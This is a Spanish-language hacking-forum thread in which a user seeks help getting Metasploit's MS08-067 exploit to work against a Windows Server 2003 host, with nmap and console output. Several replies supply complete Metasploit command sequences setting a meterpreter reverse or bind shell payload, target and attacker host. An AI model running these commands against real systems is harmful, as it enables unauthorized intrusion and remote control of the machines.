elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Ayuda para pentesting a servidor web con Windows Server 2003
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda para pentesting a servidor web con Windows Server 2003  (Leído 10,073 veces)
ElLoboHack

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Ayuda para pentesting a servidor web con Windows Server 2003
« en: 12 Noviembre 2015, 13:40 pm »

Saludos a todos estoy intentando hacer una penetacion a un servidor con WS 2003 y el "famoso exploit " ms08_067_netapi no me funciona para nada aun teniendo el servidor el puerto 445 abierto , a continiacion el resultado del nmap

nmap -sS -sV -O 172.19.45.0

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-11-12 06:47 EST
Nmap scan report for pgajpl (172.19.45.0)
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows 98 netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
2701/tcp open  cmrcservice   Microsoft Configuration Manager Remote Control service (CmRcService.exe)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 4 hops
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_server_2003

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds

Y este es el resultado del exploit:

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 172.19.45.77:4444
  • Automatically detecting the target...
  • Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
  • We could not detect the language pack, defaulting to English
  • Selected Target: Windows 2003 SP2 English (NX)
  • Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >

Si alguien me pudiera orientar acerca de que pueda estar pasando si es que el exploit esta desactualzado o algo se los agradeceria gracias antemano colegas.
En línea

juanvelasco

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #1 en: 1 Diciembre 2015, 18:41 pm »

Manda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #2 en: 3 Diciembre 2015, 18:54 pm »

Manda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload
No se supone que al lanzar "exploit" y genera un resultado positivo/negativo es porque selecciono el payload?
Esa "vulnerabilidad" esta más que parchada, solo funciona en entornos controlados.
En línea

Te vendería mi talento por poder dormir tranquilo.
0D4RUJD

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #3 en: 18 Diciembre 2015, 13:10 pm »

Buenas!

Efectivamente, el problema que tienes es que seguramente no hayas configurado el payload.

Prueba esto:
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set rhost 172.19.45.0
> set lport 445  (esto realmente no es necesario ya que debería venir por defecto)
> exploit

Saludos ;)
En línea

ElLoboHack

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #4 en: 22 Enero 2016, 07:43 am »

Saludos amigos no creo que el problema sea por no configurar el payload ya que lo tengo bien configurado

> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/reverse_tcp
> set rhost 172.19.45.0
> set lport 445 
> exploit

estoy usando la configuracion que mas se utiliza por lo que pude ver, pero ami no me funciona tambien use la configuracion que dijo un companero que me respondio a qui en el foro y nada yo pienso que ese exploit ya esta inservible.
En línea

MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.518


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #5 en: 22 Enero 2016, 12:37 pm »

... yo pienso que ese exploit ya esta inservible.

Piensas bien. Estás usando un exploit del 2008 en el 2015...  :P

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

0xFer


Desconectado Desconectado

Mensajes: 400



Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #6 en: 23 Enero 2016, 16:18 pm »

Bueno ya estamos en el 2016 así que es más inservible todavía  :laugh:
« Última modificación: 23 Enero 2016, 16:24 pm por 0xFer » En línea

Código
  1. int getRandomNumber(){
  2.    return 4; //chosen by fair dice roll
  3.              //guaranteed to be random
  4. }
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #7 en: 31 Enero 2016, 22:39 pm »

Si te fijas el Payload está configurado para servidores que posean como lenguaje Inglés, por lo cual modificando el idioma (si es que el exploit dispone de tal configuración) por otro podría funcionar el exploit.

Saludos
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
steran

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Ayuda para pentesting a servidor web con Windows Server 2003
« Respuesta #8 en: 1 Mayo 2016, 20:10 pm »

Que tal compas buen dia !!

este error se debe a que debes configurar el target, el error que mandas te indica que lo configures y seria asi:

> use exploit/windows/smb/ms08_067_netapi
> set rhost xx.xx.xx.xx (ip victima)
> show targets (aqui te aparece una lista de todos los tipos de targets(versiones windows) que es compitble el exploit selecciona el que te indica metasploit que es Windows 2003 SP2 English (NX) o la version a que corresponde el windows victima)
> set target Windows 2003 SP2 English (NX)
> set payload windows/meterpreter/reverse_tcp
> set lhost xx.xx.xx.xx (tu ip)
> exploit

eso deberia funcionar
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Necesito ayuda para configurar l2tp en windows server 2003
Windows
franelo 3 3,127 Último mensaje 11 Mayo 2013, 03:11 am
por Buggcon
Ayuda pentesting a servidor Linux, Debian
Hacking
TheMasterCracker 3 3,907 Último mensaje 21 Febrero 2017, 05:01 am
por engel lex
Libros para empezar en el pentesting?
Hacking
isaacdvid 1 3,747 Último mensaje 6 Abril 2017, 12:09 pm
por Ancasu
Necesito ayuda con pentesting
Seguridad
LHOST96 3 2,542 Último mensaje 24 Mayo 2017, 21:20 pm
por Ancasu
Santoku - VM para pentesting en Android
Seguridad
r32 0 3,185 Último mensaje 20 Enero 2019, 21:04 pm
por r32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines